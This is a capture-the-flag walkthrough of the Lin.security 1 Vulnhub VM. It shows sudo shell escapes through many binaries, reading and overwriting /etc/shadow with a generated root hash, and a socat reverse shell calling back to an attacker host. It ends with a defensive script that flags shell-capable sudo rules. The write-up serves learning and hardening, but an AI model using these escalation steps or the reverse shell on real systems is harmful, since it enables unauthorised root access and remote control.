Lin.security 1

Vulnhub virtual machine; OSCP prep box and a change of pace. This box required executing multiple binaries via sudo that lead to root. Great information to have worked through.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Vulnhub Link: https://www.vulnhub.com/entry/linsecurity-1,244/
File: lin.security_v1.0.ova (virtualbox)

Discover VM on network:

netdiscover -r 192.168.56.0/24

Target: 192.168.56.115

Enumeration

Nmap Scan:

nmap -sV -sC -oA nmap/lin 192.168.56.115

Open ports of note:
SSH (front door)
Port 111 (non standard port)
Port 2049 (non standard port)

Back to the Vulnhub page to read the description.

Without fail, it's always the last line: we have credentials.

Login via SSH

Perform a sudo check:

sudo -l

bob has access to quite a few binaries; let's investigate:

Root Binary Practice

ash

sudo ash

awk

sudo awk 'BEGIN {system("whoami")}'

/bin/bash

sudo /bin/bash

/bin/csh

sudo csh

curl

Just use curl to download a script.

dash

sudo dash

ed

sudo ed
! whoami

(ctrl+z to stop)

env

sudo env /bin/bash

expect

sudo expect -i

find

sudo find /dev/null -exec sh \;

ftp

sudo ftp
! /bin/bash

less

sudo less shell.sh
!sh   # typed once inside the less pager

shell.sh

#!/bin/sh
/bin/sh

man

sudo man man
!sh   # typed once inside the man pager

more

sudo more /etc/shadow

(prints shadow file hashes)

socat

Attacking machine:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Victim machine:

sudo socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.56.102:4444

The reverse connection is established.

vi

sudo vi
:shell

alternative (quicker):

sudo vi -c '!bash'

pico

First create a new password hash:

openssl passwd -1 -salt xyz password

sudo pico /etc/shadow

(opens the editor on /etc/shadow: replace root's password hash with the one just created)

rvim

sudo rvim /etc/shadow

(change the password as above with pico)

perl

sudo perl
exec "/bin/bash";   # after typing this, press ctrl+d to execute

tclsh

sudo tclsh
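Every escape above works for the same reason: sudoers lets bob run a binary as root that can spawn a shell, run a command, or read and write any file. As an added defender's check (not part of the original write-up), this Python script parses `sudo -l` output and flags each rule that grants one of the shell-capable binaries worked through above, or unrestricted ALL; the sample output is constructed to resemble bob's rules, not captured from the box.

```python
import os
import re

# Binaries from the list above: run as root, each yields a shell or arbitrary file access.
SHELL_CAPABLE = {
    "ash", "awk", "bash", "csh", "curl", "dash", "ed", "env", "expect", "find",
    "ftp", "less", "man", "more", "pico", "rvim", "perl", "socat", "tclsh", "vi",
}
USER_RE = re.compile(r"User (\S+) may run the following commands")
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?:(?P<tags>[A-Z_:\s]+):\s*)?(?P<cmds>.*)$")

def sudo_rules(text):
    """Yield (user, runas, tags, [cmd, ...]) for each rule in `sudo -l` output."""
    user, rules = None, []
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1)          # the rules follow this header line
            continue
        stripped = line.strip()
        if user is None or not stripped:
            continue
        if stripped.startswith("("):
            rules.append(stripped)
        elif rules:                    # sudo wraps long rules onto indented lines
            rules[-1] += " " + stripped
    for rule in rules:
        m = RULE_RE.match(rule)
        if m:
            cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
            yield user, m.group("runas"), (m.group("tags") or "").strip(), cmds

def audit_sudo_l(text):
    """Return (user, command, reason) for every rule that hands out a root shell."""
    findings = []
    for user, runas, tags, cmds in sudo_rules(text):
        for cmd in cmds:
            if cmd != "ALL" and os.path.basename(cmd.split()[0]) not in SHELL_CAPABLE:
                continue
            reason = "unrestricted sudo" if cmd == "ALL" else "shell-capable binary as " + runas
            if "NOPASSWD" in tags:
                reason += ", no password required"
            findings.append((user, cmd, reason))
    return findings

# Constructed `sudo -l` output modelled on the box's bob account, not a captured transcript.
SAMPLE = """User bob may run the following commands on lin:
    (ALL) NOPASSWD: /bin/ash, /usr/bin/awk, /bin/bash, /usr/bin/curl, /usr/bin/find,
        /usr/bin/less, /usr/bin/man, /usr/bin/pico, /usr/bin/perl, /usr/bin/socat, /usr/bin/vi
"""
```

Run it against the real `sudo -l` output of each account on a host; any finding means the sudo rule should be tightened to a specific, non-interactive command or removed.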

Finally, inside /home/susan lives a file called .secret, which contains the flag.

Bring me the root!


Cont. Learning

Shoutout to Hackso.me, which has a great write-up with an entire breakdown of getting inside the box and working through the users. Well documented and worth checking out.

https://hackso.me/lin.security-1-walkthrough/